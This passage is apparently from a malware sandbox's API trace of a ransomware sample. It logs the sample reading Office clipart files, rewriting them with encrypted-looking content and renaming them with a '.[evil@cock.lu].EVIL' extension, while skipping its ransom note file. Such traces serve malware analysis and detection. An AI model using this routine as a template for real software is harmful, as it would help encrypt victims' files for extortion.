_SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.933] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF") returned 69 [0146.933] wcscmp (_String1="J0152708.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.933] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152708.WMF") returned 0x0 [0146.933] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF") returned 0x45 [0146.933] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152708.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.935] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x132c, lpOverlapped=0x0) returned 1 [0146.945] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.945] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.945] _errno () returned 0x84b1160840 [0146.945] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.945] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x1340, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1340, lpOverlapped=0x0) returned 1 [0146.946] CloseHandle (hObject=0x1a8) returned 1 [0146.946] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.946] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.946] __uncaught_exception () returned 0x84b1160800 [0146.946] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.946] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152708.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152708.wmf.[evil@cock.lu].evil")) returned 1 [0146.947] ??_V@YAXPEAX@Z () returned 0x1 [0146.950] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF", dwFileAttributes=0x200) returned 0 [0146.951] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.951] wcsstr (_Str="J0152716.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.951] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF") returned 69 [0146.951] wcscmp (_String1="J0152716.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.951] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152716.WMF") returned 0x0 [0146.951] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF") returned 0x45 [0146.951] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152716.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.953] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x11e4, lpOverlapped=0x0) returned 1 [0146.968] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.968] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.968] _errno () returned 0x84b1160840 [0146.968] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.968] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1200, lpOverlapped=0x0) returned 1 [0146.968] CloseHandle (hObject=0x1a8) returned 1 [0146.968] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.969] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.969] __uncaught_exception () returned 0x84b1160800 [0146.969] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.969] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152716.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152716.wmf.[evil@cock.lu].evil")) returned 1 [0146.970] ??_V@YAXPEAX@Z () returned 0x1 [0146.973] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF", dwFileAttributes=0x200) returned 0 [0146.973] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.985] wcsstr (_Str="J0152722.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.985] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152722.WMF") returned 69 [0146.985] wcscmp (_String1="J0152722.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.985] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152722.WMF") returned 0x0 [0146.985] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152722.WMF") returned 0x45 [0146.985] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152722.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152722.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.987] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1b6c, lpOverlapped=0x0) returned 1 [0146.990] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.990] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.990] _errno () returned 0x84b1160840 [0146.990] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.990] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x1b80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1b80, lpOverlapped=0x0) returned 1 [0146.990] CloseHandle (hObject=0x1a8) returned 1 [0146.990] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152722.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.991] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.991] __uncaught_exception () returned 0x84b1160800 [0146.991] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.991] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152722.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152722.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152722.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152722.wmf.[evil@cock.lu].evil")) returned 1 [0146.992] ??_V@YAXPEAX@Z () returned 0x1 [0146.995] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152722.WMF", dwFileAttributes=0x200) returned 0 [0146.995] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.995] wcsstr (_Str="J0152876.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.995] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152876.WMF") returned 69 [0146.995] wcscmp (_String1="J0152876.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.995] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152876.WMF") returned 0x0 [0146.995] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152876.WMF") returned 0x45 [0146.995] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152876.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152876.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.997] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1ec4, lpOverlapped=0x0) returned 1 [0147.007] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.007] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.007] _errno () returned 0x84b1160840 [0147.007] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.007] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x1ee0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1ee0, lpOverlapped=0x0) returned 1 [0147.007] CloseHandle (hObject=0x1a8) returned 1 [0147.008] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152876.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.008] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.008] __uncaught_exception () returned 0x84b1160800 [0147.008] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.008] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152876.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152876.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152876.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152876.wmf.[evil@cock.lu].evil")) returned 1 [0147.009] ??_V@YAXPEAX@Z () returned 0x1 [0147.012] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152876.WMF", dwFileAttributes=0x200) returned 0 [0147.012] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.012] wcsstr (_Str="J0152878.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.012] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152878.WMF") returned 69 [0147.012] wcscmp (_String1="J0152878.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.012] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152878.WMF") returned 0x0 [0147.012] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152878.WMF") returned 0x45 [0147.012] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152878.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152878.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.014] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3a28, lpOverlapped=0x0) returned 1 [0147.017] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.017] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.017] _errno () returned 0x84b1160840 [0147.017] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.017] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x3a40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3a40, lpOverlapped=0x0) returned 1 [0147.018] CloseHandle (hObject=0x1a8) returned 1 [0147.018] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152878.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.018] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.018] __uncaught_exception () returned 0x84b1160800 [0147.018] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.018] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152878.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152878.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152878.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152878.wmf.[evil@cock.lu].evil")) returned 1 [0147.019] ??_V@YAXPEAX@Z () returned 0x1 [0147.022] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152878.WMF", dwFileAttributes=0x200) returned 0 [0147.023] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.023] wcsstr (_Str="J0152882.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.023] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152882.WMF") returned 69 [0147.023] wcscmp (_String1="J0152882.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.023] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152882.WMF") returned 0x0 [0147.023] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152882.WMF") returned 0x45 [0147.023] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152882.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152882.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.025] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2370, lpOverlapped=0x0) returned 1 [0147.031] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.031] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.031] _errno () returned 0x84b1160840 [0147.032] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.032] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x2380, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2380, lpOverlapped=0x0) returned 1 [0147.032] CloseHandle (hObject=0x1a8) returned 1 [0147.032] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152882.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.032] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.032] __uncaught_exception () returned 0x84b1160800 [0147.032] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.033] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152882.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152882.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152882.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152882.wmf.[evil@cock.lu].evil")) returned 1 [0147.034] ??_V@YAXPEAX@Z () returned 0x1 [0147.037] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152882.WMF", dwFileAttributes=0x200) returned 0 [0147.037] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.037] wcsstr (_Str="J0152884.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.037] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152884.WMF") returned 69 [0147.037] wcscmp (_String1="J0152884.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.037] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152884.WMF") returned 0x0 [0147.038] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152884.WMF") returned 0x45 [0147.038] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152884.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152884.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.041] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1b2c, lpOverlapped=0x0) returned 1 [0147.044] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.044] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.044] _errno () returned 0x84b1160840 [0147.044] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.044] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x1b40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1b40, lpOverlapped=0x0) returned 1 [0147.044] CloseHandle (hObject=0x1a8) returned 1 [0147.044] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152884.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.044] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.044] __uncaught_exception () returned 0x84b1160800 [0147.044] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.045] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152884.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152884.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152884.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152884.wmf.[evil@cock.lu].evil")) returned 1 [0147.046] ??_V@YAXPEAX@Z () returned 0x1 [0147.049] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152884.WMF", dwFileAttributes=0x200) returned 0 [0147.049] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.049] wcsstr (_Str="J0152890.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.049] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF") returned 69 [0147.050] wcscmp (_String1="J0152890.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.050] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152890.WMF") returned 0x0 [0147.050] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF") returned 0x45 [0147.050] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152890.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.060] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x794, lpOverlapped=0x0) returned 1 [0147.063] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.063] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.063] _errno () returned 0x84b1160840 [0147.063] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.063] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x7a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7a0, lpOverlapped=0x0) returned 1 [0147.063] CloseHandle (hObject=0x1a8) returned 1 [0147.064] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.064] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.064] __uncaught_exception () returned 0x84b1160800 [0147.064] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.064] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152890.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152890.wmf.[evil@cock.lu].evil")) returned 1 [0147.065] ??_V@YAXPEAX@Z () returned 0x1 [0147.069] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF", dwFileAttributes=0x200) returned 0 [0147.069] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.069] wcsstr (_Str="J0152892.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.069] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152892.WMF") returned 69 [0147.069] wcscmp (_String1="J0152892.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.069] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152892.WMF") returned 0x0 [0147.069] wcslen (_String="C:\\\\Program Files\\Microsoft 